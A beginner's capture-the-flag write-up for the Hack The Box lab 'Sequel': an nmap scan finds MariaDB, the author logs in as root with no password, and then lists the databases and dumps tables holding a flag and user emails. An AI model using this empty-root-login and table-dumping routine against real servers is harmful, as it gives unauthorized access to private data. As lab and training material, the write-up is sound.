Sequel Writeup

In the previous writeup, Appointment, I got a little exposure to SQL. I learned how a web application could use some sort of database to authenticate users and how that can be taken advantage of if not properly configured. For this box, I got to work with such a database directly which helped cement what I had learned previously.


Initial Recon

Started off with the standard nmap scan.

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Sequel]
└─$ sudo nmap -sC -sV -oA nmap/initial $tgt
[sudo] password for crimson: 
Sorry, try again.
[sudo] password for crimson: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-17 21:08 CDT
Nmap scan report for 10.129.82.245
Host is up (0.049s latency).
Not shown: 999 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 66
|   Capabilities flags: 63486
|   Some Capabilities: DontAllowDatabaseTableColumn, Speaks41ProtocolNew, Speaks41ProtocolOld, LongColumnFlag, SupportsTransactions, FoundRows, SupportsCompression, IgnoreSigpipes, InteractiveClient, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, ODBCClient, Support41Auth, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: 1pbyZ7A#)BPKgHmnc##%
|_  Auth Plugin Name: mysql_native_password
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.57 seconds

There is a single port open – MySQL on port 3306.

Initial Access

MySQL

What is MySQL? It is an open-source database system. There can be multiple databases being managed by MySQL and each database contains tables. These tables have various columns with information.

Since the remote host is running MySQL and the port seems to be open, I tried to connect to it with the command mysql. Use -h to specificy the remote system’s IP, -P for the port it is running on, -u for username and -p for the password or to prompt the user for a password. After some guessing I was able to login with the username root and no password.

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Sequel]
└─$ mysql -h 10.129.82.245 -u root -P 3306 -p                                                                130 ⨯
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 77
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 

After logging in it says it is running MariaDB, a flavor of MySQL. Not being familiar with MariaDB command line syntax I had to do some research. Eventually I came across a command cheat sheet that proved very useful. It can be found here – hxxps[://]mariadb[.]com/wp-content/uploads/2021/08/mariadb-standard-developer_cheat-sheet_1113[.]pdf

First thing I did was list what databases are available with the show DATABASES; commad and there are four.

MariaDB [(none)]> show DATABASES;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.049 sec)

The htb database seems interesting so I selected that database by using the use [INSERT DATABASE]; command. To list the tables within the database use the show TABLES; command.

MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]> show TABLES;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.051 sec)

I can see that there are two tables in the htb database. To pull the information in that table use select * from [INSERT TABLE];. In the config table there is the flag, simple as that!

MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | <SNIP> |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.049 sec)

MariaDB [htb]> select * from users;
+----+----------+------------------+
| id | username | email            |
+----+----------+------------------+
|  1 | admin    | [email protected] |
|  2 | lara     | [email protected]  |
|  3 | sam      | [email protected]   |
|  4 | mary     | [email protected]  |
+----+----------+------------------+
4 rows in set (0.052 sec)